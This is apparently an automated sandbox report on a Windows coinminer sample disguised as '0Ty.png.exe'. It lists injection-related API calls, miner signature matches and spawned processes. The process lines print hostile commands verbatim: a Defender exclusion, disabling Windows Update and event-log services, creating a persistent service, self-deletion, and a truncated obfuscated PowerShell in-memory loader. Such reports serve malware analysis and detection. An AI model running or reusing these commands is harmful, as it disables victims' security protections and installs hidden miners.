            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8B0F20 NtSetContextThread,28_2_00007FFD9B8B0F20
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8B0C5D NtWriteVirtualMemory,28_2_00007FFD9B8B0C5D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8B0A3E NtUnmapViewOfSection,28_2_00007FFD9B8B0A3E
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8AE078 NtUnmapViewOfSection,28_2_00007FFD9B8AE078
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001394 NtOpenKey,64_2_0000000140001394
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8B1004 NtResumeThread,66_2_00007FFD9B8B1004
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8B0F40 NtSetContextThread,66_2_00007FFD9B8B0F40
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8B0C7D NtWriteVirtualMemory,66_2_00007FFD9B8B0C7D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8AE0C8 NtUnmapViewOfSection,66_2_00007FFD9B8AE0C8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8B0A5E NtUnmapViewOfSection,66_2_00007FFD9B8B0A5E
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8AE098 NtUnmapViewOfSection,66_2_00007FFD9B8AE098
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8AE0A8 NtUnmapViewOfSection,66_2_00007FFD9B8AE0A8
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,68_2_0000000140001860
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC642990 NtEnumerateValueKey,NtEnumerateValueKey,69_2_00000225DC642990
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AE2604 NtQueryDirectoryFileEx,GetFileType,StrCpyW,70_2_00000202C0AE2604
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AE211C NtQuerySystemInformation,StrCmpNIW,70_2_00000202C0AE211C
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE02990 NtEnumerateValueKey,NtEnumerateValueKey,72_2_000002BAAEE02990
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,73_2_0000000140001860
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeFile created: C:\Windows\TEMP\ihddniqxcjeb.sysJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_e5142syl.zjb.ps1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8AF63E28_2_00007FFD9B8AF63E
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8ADD5828_2_00007FFD9B8ADD58
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8AE32928_2_00007FFD9B8AE329
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8AFDE928_2_00007FFD9B8AFDE9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8AF65928_2_00007FFD9B8AF659
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8ADCD328_2_00007FFD9B8ADCD3
            Source: C:\Windows\System32\conhost.exeCode function: 31_3_0000024089941FF431_3_0000024089941FF4
            Source: C:\Windows\System32\conhost.exeCode function: 31_3_0000024089953CD831_3_0000024089953CD8
            Source: C:\Windows\System32\conhost.exeCode function: 31_3_000002408994D51031_3_000002408994D510
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A2A48D831_2_000002408A2A48D8
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A29E11031_2_000002408A29E110
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A292BF431_2_000002408A292BF4
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_000000014000324064_2_0000000140003240
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_00000001400027D064_2_00000001400027D0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8ADD7866_2_00007FFD9B8ADD78
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8AE34966_2_00007FFD9B8AE349
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9BB2354266_2_00007FFD9BB23542
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9BB230D166_2_00007FFD9BB230D1
            Source: C:\Windows\System32\conhost.exeCode function: 67_3_0000014ECB483CD867_3_0000014ECB483CD8
            Source: C:\Windows\System32\conhost.exeCode function: 67_3_0000014ECB47D51067_3_0000014ECB47D510
            Source: C:\Windows\System32\conhost.exeCode function: 67_3_0000014ECB471FF467_3_0000014ECB471FF4
            Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000014ECB4B48D867_2_0000014ECB4B48D8
            Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000014ECB4AE11067_2_0000014ECB4AE110
            Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000014ECB4A2BF467_2_0000014ECB4A2BF4
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140001CF068_2_0000000140001CF0
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140002D5468_2_0000000140002D54
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_000000014000127468_2_0000000140001274
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_000000014000243468_2_0000000140002434
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_00000001400031D868_2_00000001400031D8
            Source: C:\Windows\System32\winlogon.exeCode function: 69_3_00000225DC611FF469_3_00000225DC611FF4
            Source: C:\Windows\System32\winlogon.exeCode function: 69_3_00000225DC623CD869_3_00000225DC623CD8
            Source: C:\Windows\System32\winlogon.exeCode function: 69_3_00000225DC61D51069_3_00000225DC61D510
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC642BF469_2_00000225DC642BF4
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC6548D869_2_00000225DC6548D8
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC64E11069_2_00000225DC64E110
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC672BF469_2_00000225DC672BF4
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC6848D869_2_00000225DC6848D8
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC67E11069_2_00000225DC67E110
            Source: C:\Windows\System32\lsass.exeCode function: 70_3_00000202C0AB1FF470_3_00000202C0AB1FF4
            Source: C:\Windows\System32\lsass.exeCode function: 70_3_00000202C0AC3CD870_3_00000202C0AC3CD8
            Source: C:\Windows\System32\lsass.exeCode function: 70_3_00000202C0ABD51070_3_00000202C0ABD510
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AE2BF470_2_00000202C0AE2BF4
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AF48D870_2_00000202C0AF48D8
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AEE11070_2_00000202C0AEE110
            Source: C:\Windows\System32\svchost.exeCode function: 71_3_000002A6612DD51071_3_000002A6612DD510
            Source: C:\Windows\System32\svchost.exeCode function: 71_3_000002A6612D1FF471_3_000002A6612D1FF4
            Source: C:\Windows\System32\svchost.exeCode function: 71_3_000002A6612E3CD871_3_000002A6612E3CD8
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A66130E11071_2_000002A66130E110
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A661302BF471_2_000002A661302BF4
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A6613148D871_2_000002A6613148D8
            Source: C:\Windows\System32\dwm.exeCode function: 72_3_000002BAAEDD1FF472_3_000002BAAEDD1FF4
            Source: C:\Windows\System32\dwm.exeCode function: 72_3_000002BAAEDDD51072_3_000002BAAEDDD510
            Source: C:\Windows\System32\dwm.exeCode function: 72_3_000002BAAEDE3CD872_3_000002BAAEDE3CD8
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE02BF472_2_000002BAAEE02BF4
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE0E11072_2_000002BAAEE0E110
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE148D872_2_000002BAAEE148D8
            Source: C:\Windows\System32\dllhost.exeCode function: 73_3_00000248FFB53CD873_3_00000248FFB53CD8
            Source: C:\Windows\System32\dllhost.exeCode function: 73_3_00000248FFB4D51073_3_00000248FFB4D510
            Source: C:\Windows\System32\dllhost.exeCode function: 73_3_00000248FFB41FF473_3_00000248FFB41FF4
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_0000000140001CF073_2_0000000140001CF0
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_0000000140002D5473_2_0000000140002D54
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_000000014000243473_2_0000000140002434
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_00000001400031D873_2_00000001400031D8
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_000000014000127473_2_0000000140001274
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_0000024880602BF473_2_0000024880602BF4
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_000002488060E11073_2_000002488060E110
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_00000248806148D873_2_00000248806148D8
            Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\ihddniqxcjeb.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
            Source: unknownProcess created: Commandline size = 5337
            Source: unknownProcess created: Commandline size = 5389
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
            Source: 00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@105/17@1/2
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140002D54 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,68_2_0000000140002D54
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_0000000140002D54 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,73_2_0000000140002D54
            Source: C:\Windows\System32\dialer.exeCode function: 24_2_0000000140001614 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,24_2_0000000140001614
            Source: C:\Windows\System32\dialer.exeCode function: 24_2_0000000140001984 FindResourceExA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,24_2_0000000140001984
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7688:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7920:120:WilError_03
            Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\gohkfyvqbpmecnid
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7676:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2416:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7928:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7784:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6992:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7832:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7888:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7492:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3848:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7972:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djuimxe0.3el.ps1Jump to behavior
            Source: 0Ty.png.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Users\user\Desktop\0Ty.png.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 0Ty.png.exeVirustotal: Detection: 65%
            Source: 0Ty.png.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\Desktop\0Ty.png.exeFile read: C:\Users\user\Desktop\0Ty.png.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\0Ty.png.exe "C:\Users\user\Desktop\0Ty.png.exe"
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HGLZSDMZ"
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto"
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "HGLZSDMZ"
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\0Ty.png.exe"
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
